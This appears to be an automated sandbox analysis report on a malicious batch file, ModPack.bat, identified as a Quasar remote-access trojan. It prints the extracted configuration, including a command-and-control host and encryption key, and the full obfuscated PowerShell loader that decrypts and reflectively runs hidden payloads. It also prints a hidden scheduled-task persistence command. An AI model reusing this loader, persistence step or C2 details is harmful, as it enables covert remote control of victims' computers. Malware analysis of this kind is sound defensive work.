Analysis
-
max time kernel
37s -
max time network
58s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
13-04-2024 20:25
Static task
static1
Behavioral task
behavioral1
Sample
ModPack.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ModPack.bat
Resource
win10v2004-20240412-en
General
-
Target
ModPack.bat
-
Size
1.6MB
-
MD5
3ab2a7793b323765353fa8e597cec156
-
SHA1
c892cc5095ac6f37d0e94bbc09e11abe3d62027a
-
SHA256
a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
-
SHA512
90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
SSDEEP
24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea
Malware Config
Extracted
quasar
1.4.1
Office04
notes-creation.gl.at.ply.gg:27030
6735a92b-88d2-4fbe-8e59-605a85072109
-
encryption_key
8681483EF512C654BECF205A0D74FFCA4B129A98
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Trapix Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/192-113-0x000001FCFCB10000-0x000001FCFCE34000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 3 192 powershell.exe 5 192 powershell.exe 7 192 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 4620 powershell.exe 4620 powershell.exe 4620 powershell.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 192 powershell.exe 192 powershell.exe 192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeIncreaseQuotaPrivilege 5044 powershell.exe Token: SeSecurityPrivilege 5044 powershell.exe Token: SeTakeOwnershipPrivilege 5044 powershell.exe Token: SeLoadDriverPrivilege 5044 powershell.exe Token: SeSystemProfilePrivilege 5044 powershell.exe Token: SeSystemtimePrivilege 5044 powershell.exe Token: SeProfSingleProcessPrivilege 5044 powershell.exe Token: SeIncBasePriorityPrivilege 5044 powershell.exe Token: SeCreatePagefilePrivilege 5044 powershell.exe Token: SeBackupPrivilege 5044 powershell.exe Token: SeRestorePrivilege 5044 powershell.exe Token: SeShutdownPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeSystemEnvironmentPrivilege 5044 powershell.exe Token: SeRemoteShutdownPrivilege 5044 powershell.exe Token: SeUndockPrivilege 5044 powershell.exe Token: SeManageVolumePrivilege 5044 powershell.exe Token: 33 5044 powershell.exe Token: 34 5044 powershell.exe Token: 35 5044 powershell.exe Token: 36 5044 powershell.exe Token: SeIncreaseQuotaPrivilege 5044 powershell.exe Token: SeSecurityPrivilege 5044 powershell.exe Token: SeTakeOwnershipPrivilege 5044 powershell.exe Token: SeLoadDriverPrivilege 5044 powershell.exe Token: SeSystemProfilePrivilege 5044 powershell.exe Token: SeSystemtimePrivilege 5044 powershell.exe Token: SeProfSingleProcessPrivilege 5044 powershell.exe Token: SeIncBasePriorityPrivilege 5044 powershell.exe Token: SeCreatePagefilePrivilege 5044 powershell.exe Token: SeBackupPrivilege 5044 powershell.exe Token: SeRestorePrivilege 5044 powershell.exe Token: SeShutdownPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeSystemEnvironmentPrivilege 5044 powershell.exe Token: SeRemoteShutdownPrivilege 5044 powershell.exe Token: SeUndockPrivilege 5044 powershell.exe Token: SeManageVolumePrivilege 5044 powershell.exe Token: 33 5044 powershell.exe Token: 34 5044 powershell.exe Token: 35 5044 powershell.exe Token: 36 5044 powershell.exe Token: SeIncreaseQuotaPrivilege 5044 powershell.exe Token: SeSecurityPrivilege 5044 powershell.exe Token: SeTakeOwnershipPrivilege 5044 powershell.exe Token: SeLoadDriverPrivilege 5044 powershell.exe Token: SeSystemProfilePrivilege 5044 powershell.exe Token: SeSystemtimePrivilege 5044 powershell.exe Token: SeProfSingleProcessPrivilege 5044 powershell.exe Token: SeIncBasePriorityPrivilege 5044 powershell.exe Token: SeCreatePagefilePrivilege 5044 powershell.exe Token: SeBackupPrivilege 5044 powershell.exe Token: SeRestorePrivilege 5044 powershell.exe Token: SeShutdownPrivilege 5044 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeSystemEnvironmentPrivilege 5044 powershell.exe Token: SeRemoteShutdownPrivilege 5044 powershell.exe Token: SeUndockPrivilege 5044 powershell.exe Token: SeManageVolumePrivilege 5044 powershell.exe Token: 33 5044 powershell.exe Token: 34 5044 powershell.exe Token: 35 5044 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exedescription pid process target process PID 4544 wrote to memory of 4620 4544 cmd.exe powershell.exe PID 4544 wrote to memory of 4620 4544 cmd.exe powershell.exe PID 4620 wrote to memory of 5044 4620 powershell.exe powershell.exe PID 4620 wrote to memory of 5044 4620 powershell.exe powershell.exe PID 4620 wrote to memory of 1540 4620 powershell.exe WScript.exe PID 4620 wrote to memory of 1540 4620 powershell.exe WScript.exe PID 1540 wrote to memory of 3400 1540 WScript.exe cmd.exe PID 1540 wrote to memory of 3400 1540 WScript.exe cmd.exe PID 3400 wrote to memory of 192 3400 cmd.exe powershell.exe PID 3400 wrote to memory of 192 3400 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_492_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_492.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_492.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_492.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_492.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_492.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:192
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD597da514a7a27270fc599c6cb620fd88f
SHA1be5e7b94013c510ceebe76b51d043cb4c4b8f594
SHA2566acabf00f2d1f8d853264cb8091217b7ca64fd57e6ae401c6bde8b6e1710feee
SHA5128ba265d7bd25d35932712062f7be52e6c40cac8f736e88f8c0b3cfa5fa0f148ea333f9e684103452ba6187135072041b1a3570ae61de3a430e6da11e2eb9fe82
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
1.6MB
MD53ab2a7793b323765353fa8e597cec156
SHA1c892cc5095ac6f37d0e94bbc09e11abe3d62027a
SHA256a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
SHA51290c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
-
Filesize
115B
MD5c243d5c52a814e474e3210f4e5cbfca9
SHA1b110207ad8f59d7f36113b37625c607e9f44f0d3
SHA256d7b9f8147c5859c398ad9f1d61a3d9947510bc15959d5b751dd737e58a45d1c1
SHA51250e5ad845060d9d829cf7df5530462ebe9dc205f171ea03f714421bbc2950b1a50ff8fd2bc6623daebc9a06125776c2c999ee7c0be077d2111347a0d067527f6